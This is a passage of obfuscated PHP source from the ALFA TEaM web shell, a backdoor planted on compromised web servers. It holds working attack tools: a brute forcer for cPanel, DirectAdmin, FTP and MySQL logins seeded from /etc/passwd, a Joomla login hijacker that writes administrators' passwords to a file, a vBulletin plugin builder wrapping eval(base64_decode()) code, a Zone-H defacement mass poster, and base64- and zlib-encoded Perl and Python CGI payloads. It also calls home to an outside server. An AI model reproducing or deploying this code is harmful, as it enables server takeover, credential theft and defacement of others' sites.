@mkdir($parent, 493, true); } } goto LikDE; D73tS: class AlfaCURL { public $headers; public $user_agent; public $compression; public $cookie_file; public $proxy; public $path; public $ssl = true; public $curl_status = true; function __construct($cookies = false, $compression = "gzip", $proxy = '') { if (!extension_loaded("curl")) { $curl_status = false; return false; } $this->headers[] = "Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg"; $this->headers[] = "Connection: Keep-Alive"; $this->headers[] = "Content-type: application/x-www-form-urlencoded;charset=UTF-8"; $this->user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36)"; $this->path = ALFA_TEMPDIR . "/Alfa_cookies.txt"; $this->compression = $compression; $this->proxy = $proxy; $this->cookies = $cookies; if ($this->cookies) { $this->cookie($this->path); } } function cookie($cookie_file) { if (_alfa_file_exists($cookie_file, false)) { $this->cookie_file = $cookie_file; } else { @fopen($cookie_file, "w") or die($this->error("The cookie file could not be opened.")); $this->cookie_file = $cookie_file; @fclose($this->cookie_file); } } function Send($url, $method = "get", $data = '') { if (!$this->curl_status) { return false; } $process = curl_init($url); curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers); curl_setopt($process, CURLOPT_HEADER, 0); curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent); curl_setopt($process, CURLOPT_RETURNTRANSFER, 1); curl_setopt($process, CURLOPT_ENCODING, $this->compression); curl_setopt($process, CURLOPT_TIMEOUT, 30); if ($this->ssl) { curl_setopt($process, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($process, CURLOPT_SSL_VERIFYHOST, false); } if ($this->cookies) { curl_setopt($process, CURLOPT_COOKIEFILE, $this->path); curl_setopt($process, CURLOPT_COOKIEJAR, $this->path); } if ($this->proxy) { curl_setopt($process, CURLOPT_PROXY, $this->proxy); } if ($method == "post") { curl_setopt($process, CURLOPT_POSTFIELDS, $data); curl_setopt($process, CURLOPT_POST, 1); curl_setopt($process, CURLOPT_HTTPHEADER, array("Content-Type: application/x-www-form-urlencoded")); } $return = @curl_exec($process); curl_close($process); return $return; } function error($error) { echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>{$error}</div></center>"; die; } } goto GoQ6c; YNiqE: function alfaaboutus() { alfahead(); echo "<div class="header">"; $news = new AlfaCURL(); $about_us = $news->Send("http://solevisible.com/aboutus.php"); if (empty($about_us)) { $about_us = "<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>\xa<b><font size='+3' color='#00A220'>&#9774; ~ PEACE ~ &#9774;</font><br><b>
<font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>
<font color='#00A220'>Contact : [email protected]</font><br>\xa<font color='#00A220'>Telegram Channel: @solevisible</font><br>\xa<font color='#FFFFFF'>Skype : ehsan.invisible</font><br>\xa<font color='#FFFFFF'>Skype : sole.sad</font><br>
<font color='#FF0000'>Persian Gulf For Ever</font><br>\xa<font color='#FF0000'>Iranian Programmers</font><br>
<font color='#FF0000'>############</font><br>\xa</center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>"; } echo __pre() . $about_us; echo "</div>"; alfafooter(); } goto Rdxmc; G40hn: die; goto vH5gS; DIhO_: if (!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } goto OpFog; gIiwJ: function findicon($file, $type) { $s = "http://solevisible.com/icons/"; $types = array("json", "ppt", "pptx", "xls", "xlsx", "msi", "config", "cgi", "pm", "c", "cpp", "cs", "java", "aspx", "asp", "db", "ttf", "eot", "woff", "woff2", "woff", "conf", "log", "apk", "cab", "bz2", "tgz", "dmg", "izo", "jar", "7z", "iso", "rar", "bat", "sh", "alfa", "gz", "tar", "php", "php4", "php5", "phtml", "html", "xhtml", "shtml", "htm", "zip", "png", "jpg", "jpeg", "gif", "bmp", "ico", "txt", "js", "rb", "py", "xml", "css", "sql", "htaccess", "pl", "ini", "dll", "exe", "mp3", "mp4", "m4a", "mov", "flv", "swf", "mkv", "avi", "wmv", "mpg", "mpeg", "dat", "pdf", "3gp", "doc", "docx", "docm"); if ($type != "file") { return $file == ".." ? $s . "back.png" : $s . "folder.png"; } else { $ext = explode(".", $file); $ext = end($ext); $ext = strtolower($ext); return in_array($ext, $types) ? $s . $ext . ".png" : $s . "notfound.png"; } } goto NkkuH; qsZZV: function __alfaziper($source, $destination) { if (!extension_loaded("zip") || !file_exists($source)) { return false; } $zip = new ZipArchive(); if (!$zip->open($destination, ZIPARCHIVE::CREATE)) { return false; } $source = str_replace("\", "/", realpath($source)); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = str_replace("\", "/", $file); if (in_array(substr($file, strrpos($file, "/") + 1), array(".", ".."))) { continue; } $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . "/", '', $file . "/")); } else { if (is_file($file) === true) { $zip->addFromString(str_replace($source . "/", '', $file), file_get_contents($file)); } } } } else { if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } return $zip->close(); } goto vrEEO; gNx00: function clean_string($string) { if (function_exists("iconv")) { $s = trim($string); $s = iconv("UTF-8", "UTF-8//IGNORE", $s); } return $s; } goto YQHDC; fabm5: function showAnimation($name) { return "-webkit-animation: " . $name . " 800ms ease-in-out forwards;-moz-animation: " . $name . " 800ms ease-in-out forwards;-ms-animation: " . $name . " 800ms ease-in-out forwards;animation: " . $name . " 800ms ease-in-out forwards;"; } goto gUiRZ; vT9b4: $CWppUDJxuf = "fu" . "n" . "ct" . "ion_" . "e" . "xist" . "s"; goto fAaD3; hho1B: $xd .= "Server Operating System : " . $_SERVER["SERVER_SOFTWARE"] . "
\xa"; goto Vyc3A; Gw1Wi: function alfacheckupdate() { if ($GLOBALS["DB_NAME"]["cgi_api"]) { if (!isset($_COOKIE["alfacgiapi_mode"]) && !isset($_COOKIE["alfacgiapi"])) { _alfa_cgicmd("whoami", "perl", true); if (strlen(alfaEx("whoami", false, true)) > 0) { __alfa_set_cookie("alfa_canruncmd", "true"); } } } if (function_exists("curl_version")) { $update = new AlfaCURL(); $json = $update->Send("http://solevisible.com/update.json?ver=" . __ALFA_VERSION__); $json = @json_decode($json, true); $data = array(); if ($json) { if (!isset($_COOKIE["alfa_checkupdate"]) && !empty($json["type"])) { if ($json["type"] == "update") { if (__ALFA_VERSION__ != $json["version"] || __ALFA_UPDATE__ != $json["version_number"]) { @setcookie("alfa_checkupdate", "1", time() + 86400); $data["content"] = "<div class="update-holder">" . $json["content"] . "</div>"; } } } if (isset($json["ads"]) && !empty($json["ads"])) { $data["content"] .= $json["ads"]; } if (isset($json["copyright"]) && !empty($json["copyright"])) { $data["copyright"] = $json["copyright"]; } if (isset($json["solevisible"]) && !empty($json["solevisible"])) { $data["solevisible"] = $json["solevisible"]; } if (isset($json["code_name"]) && !empty($json["code_name"])) { $data["code_name"] = $json["code_name"]; $data["version_number"] = __ALFA_VERSION__; } if (isset($json["market"]) && !empty($json["market"])) { $data["market"] = $json["market"]; } echo @json_encode($data); } } } goto kavzq; LJenm: function Alfa_DirectAdmin_Cracker($info) { if (!$info["mysql"]) { $url = $info["protocol"] . $info["target"] . ":" . $info["port"] . "/CMD_LOGIN"; } else { $url = $info["protocol"] . $info["target"] . "/phpmyadmin"; } $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0"); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERPWD, $info["username"] . ":" . $info["password"]); if ($info["mysql"]) { curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY); } $result = @curl_exec($curl); $curl_errno = curl_errno($curl); $curl_error = curl_error($curl); if ($curl_errno > 0) { echo "<font color='red'>Error: {$curl_error}</font><br>"; } elseif (preg_match("/CMD_FILE_MANAGER|frameset/i", $result)) { echo "UserName: <font color="red">" . $info["username"] . "</font> PassWord: <font color="red">" . $info["password"] . "</font><font color="green">  Login Success....</font><br>"; $info["target"] = $url; CrackerResualt($info); } curl_close($curl); } goto pr6oW; tI2qh: function alfaCrackers() { alfahead(); AlfaNum(9, 10); echo "<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g('Crackers',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,'start',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">"; foreach (array("cp" => "Cpanel", "direct" => "DirectAdmin", "ftp" => "FTP", "phpmyadmin" => "PhpMyAdmin[DirectAdmin]", "mysql" => "mysql_connect()", "ftpc" => "ftp_connect()") as $key => $val) { echo "<option value="" . $key . "">" . $val . "</option>"; } echo "</select> Protocol: <select id="protocol" name="protocol">"; foreach (array("https://", "http://", "ftp://") as $val) { echo "<option value="" . $val . "">" . $val . "</option>"; } echo "</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">\xaPort: <input id="port" type="text" name="port" value="2083">
<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
<textarea placeholder="Users" rows="20" cols="25" name="usernames">" . ($GLOBALS["sys"] == "unix" ? alfaEx("cut -d: -f1 /etc/passwd") : '') . "</textarea>
&nbsp <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>\xaSave Result Into File <input type="text" name="fcrack" value="cracked.txt">
<p><input type="submit" name="cracking" value=" " /></div></form></p><center>"; $target = str_replace(array("https://", "http://", "ftp://"), '', $_POST["alfa1"]); $port = $_POST["alfa2"]; $usernames = $_POST["alfa3"]; $passwords = $_POST["alfa4"]; $fcrack = $_POST["alfa5"]; $cracking = $_POST["alfa6"]; $protocol = $_POST["alfa7"]; $loginpanel = $_POST["alfa8"]; $p = $loginpanel == "phpmyadmin" ? $p = true : false; if ($cracking == "start") { echo __pre(); $exuser = explode("
", $usernames); $expw = explode("\xa", $passwords); foreach ($exuser as $user) { foreach ($expw as $pw) { $array = array("username" => trim($user), "password" => trim($pw), "port" => trim($port), "target" => trim($target), "protocol" => trim($protocol), "fcrack" => trim($fcrack), "mysql" => $p); Alfa_Call_Function_Cracker($loginpanel, $array); } } echo "<br><font color="red">Attack Finished...</font>"; } echo "</div>"; alfafooter(); } goto hVRBs; JTfLu: function AlfaiFrameCreator($f, $width = "100%", $height = "600px") { return "<iframe src="" . __ALFA_DATA_FOLDER__ . "/" . $f . "" width="" . $width . "" height="" . $height . "" frameborder="0"></iframe>"; } goto D73tS; ROY6n: function alfaselfrm() { if (isset($_POST["alfa1"]) && $_POST["alfa1"] == "yes") { echo __pre() . "<center>"; if (@unlink($GLOBALS["__file_path"])) { echo "<b>Shell has been removed</i> :)</b>"; } else { echo "unlink error!"; } echo "</center>"; } if (isset($_POST["alfa1"]) && $_POST["alfa1"] != "yes") { echo "<div class=header>"; echo "\xa<center><p><img src="http://solevisible.com/images/farvahar-iran.png"></p>"; echo "<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g('selfrm',null,'yes');"> Yes</a>"; echo "</p></center></div>"; } } goto bthgC; EZmej: $GLOBALS["cwd"] = isset($_POST["c"]) && @is_dir($_POST["c"]) ? $_POST["c"] : @alfaGetCwd(); goto f0Lpk; y_pCK: function alfaMakePwd() { if (_alfa_file_exists("/etc/virtual/domainowners") || _alfa_file_exists("/etc/named.conf") && _alfa_file_exists("/etc/valiases")) { return "/home/{user}/public_html/"; } $document = explode("/", $_SERVER["DOCUMENT_ROOT"]); $public = end($document); array_pop($document); array_pop($document); $path = implode("/", $document) . "/{user}/" . $public; return $path; } goto LUHcx; Enl9a: function hijackJoomla($path, $saveto) { $code = "<?php jimport('joomla.user.authentication');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array('username'=>$_POST['username'],'password'=>$_POST['passwd']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST['passwd']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>"; $code = str_replace("{saveto_path}", $saveto, $code); $comp = $path . "/administrator/components/com_login/"; if (@is_file($comp . "/login.php")) { $login = $comp . "/login.php"; } elseif (@is_file($comp . "/admin.login.php")) { $login = $comp . "/admin.login.php"; } else { $login = ''; } if (@is_file($login) and @is_writable($login) and $login != '') { $data_login = @file_get_contents($login); $evil_login = $code . "
" . $data_login; @file_put_contents($login, $evil_login); hijackOutput(0, $saveto); } else { hijackOutput(1); } } goto kS5vr; asGME: function alfaphp2xml() { alfahead(); AlfaNum(8, 9, 10, 7, 6, 5, 4, 3); echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit="g('php2xml',null,this.code.value,'>>'); return false;" method='post'>\xa<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder="insert your shell code"></textarea><br/><br/>\xa<input type='submit' name='go' value=' ' /></p></form></center>"; if ($_POST["alfa2"] && $_POST["alfa2"] == ">>") { echo __pre() . "<p><center><textarea rows='10' name='users' cols='80'>"; echo "<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER['PHP_SELF'],"subscriptions.php")){eval(base64_decode('" . __ZW5jb2Rlcg($_POST["alfa1"]) . "'));exit;}]]></phpcode></plugin></plugins>"; echo "</textarea></center></p>"; } echo "</center></div>"; alfafooter(); } goto he7vt; ANGyI: function alfazoneh() { alfahead(); echo "<div class=header>"; if (!function_exists("curl_version")) { echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>"; } $hackmode = array("known vulnerability (i.e. unpatched system)", "undisclosed (new) vulnerability", "configuration / admin. mistake", "brute force attack", "social engineering", "Web Server intrusion", "Web Server external module intrusion", "Mail Server intrusion", "FTP Server intrusion", "SSH Server intrusion", "Telnet Server intrusion", "RPC Server intrusion", "Shares misconfiguration", "Other Server intrusion", "SQL Injection", "URL Poisoning", "File Inclusion", "Other Web Application bug", "Remote administrative panel access bruteforcing", "Remote administrative panel access password guessing", "Remote administrative panel access social engineering", "Attack against administrator(password stealing/sniffing)", "Access credentials through Man In the Middle attack", "Remote service password guessing", "Remote service password bruteforce", "Rerouting after attacking the Firewall", "Rerouting after attacking the Router", "DNS attack through social engineering", "DNS attack through cache poisoning", "Not available", "Cross-Site Scripting"); $reason = array("Heh...just for fun!", "Revenge against that website", "Political reasons", "As a challenge", "I just want to be the best defacer", "Patriotism", "Not available"); echo "
<center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
<form action="" method="post" onsubmit="g('zoneh',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,'>>'); return false;">\xa<input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
<br>\xa<select id="text" name="hackmode" style="width:400px;">"; $x = 1; foreach ($hackmode as $mode) { echo "<option style="background-color: rgb(F, F, F);" value="" . $x . "">" . $mode . "</option>"; $x++; } echo "</select><br><select id="text" name="reason" style="width:200px;">"; $x = 1; foreach ($reason as $mode) { echo "<option style="background-color: rgb(F, F, F);" value="" . $x . "">" . $mode . "</option>"; $x++; } echo "</select><br>
<textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>\xa<p><input type="submit" value=" " name="go" /></p>
</form></center>"; if ($_POST["alfa5"] && $_POST["alfa5"] == ">>") { ob_start(); $hacker = $_POST["alfa1"]; $method = $_POST["alfa2"]; $neden = $_POST["alfa3"]; $site = $_POST["alfa4"]; if (empty($hacker)) { die(__pre() . "<center><b><font color ="#FF0000">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>"); } elseif ($method == "------------------------------------SELECT-------------------------------------") { die(__pre() . "<center><b><font color ="#FF0000">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>"); } elseif ($neden == "------------------------------------SELECT-------------------------------------") { die(__pre() . "<center><b><font color ="#FF0000">[+] YOU MUST SELECT THE REASON [+]</b></font></center>"); } elseif (empty($site)) { die(__pre() . "<center><b><font color ="#FF0000">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>"); } $i = 0; $sites = explode("\xa", $site); $alfa = new AlfaCURL(); while ($i < count($sites)) { if (substr($sites[$i], 0, 4) != "http") { $sites[$i] = "http://" . $sites[$i]; } $alfa->Send("http://www.zone-h.com/notify/single", "post", "defacer=" . $hacker . "&domain1=" . $sites[$i] . "&hackmode=" . $method . "&reason=" . $neden); ++$i; } echo __pre() . "<center><font color ="#00A220"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>"; } echo "</div>"; alfafooter(); } goto aIT44; pr6oW: function Alfa_CP_Cracker($info) { $url = $info["protocol"] . $info["target"] . ":" . $info["port"]; $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0"); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_HEADER, 0); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info["username"] . ":" . $info["password"]) . "

")); curl_setopt($curl, CURLOPT_URL, $url); $result = @curl_exec($curl); $curl_errno = curl_errno($curl); $curl_error = curl_error($curl); if ($curl_errno > 0) { echo "<font color='red'>Error: {$curl_error}</font><br>"; } elseif (preg_match("/filemanager/i", $result)) { echo "UserName: <font color="red">" . $info["username"] . "</font> PassWord: <font color="red">" . $info["password"] . "</font><font color="green">  Login Success....</font><br>"; $info["target"] = $url; CrackerResualt($info); } curl_close($curl); } goto rMYDl; LikDE: function alfasymlink() { alfahead(); AlfaNum(9, 10); alfaCreateParentFolder(); @chdir($GLOBALS["home_cwd"] . "/" . __ALFA_DATA_FOLDER__); echo "<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g('symlink',null,null,'symphp')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g('symlink',null,null,'symperl')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g('symlink',null,null,'sympy')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g('symlink',null,null,null,null,'SymFile')">| File Symlink | </a></h3></center>"; if (isset($_POST["alfa2"]) && ($_POST["alfa2"] == "symperl" || $_POST["alfa2"] == "sympy")) { $sympath = alfaMakePwd(); @mkdir("cgialfa", 493); @chdir("cgialfa"); alfacgihtaccess("cgi"); $perl = "#!/usr/bin/perl   -I/usr/local/bandmin" . "
" . "use MIME::Base64;use Compress::Zlib;my $alfa_data="" . __ALFA_DATA_FOLDER__ . "";eval(Compress::Zlib::memGunzip(decode_base64("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")));"; $py = "#!/usr/bin/python" . "\xaimport zlib, base64\xaalfa_data='" . __ALFA_DATA_FOLDER__ . "'\xa" . "eval(compile(zlib.decompress(base64.b64decode("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")),'<string>','exec'))"; $cginame = "symperl.alfa"; $source = $perl; $lang = "perl"; if ($_POST["alfa2"] == "sympy") { $cginame = 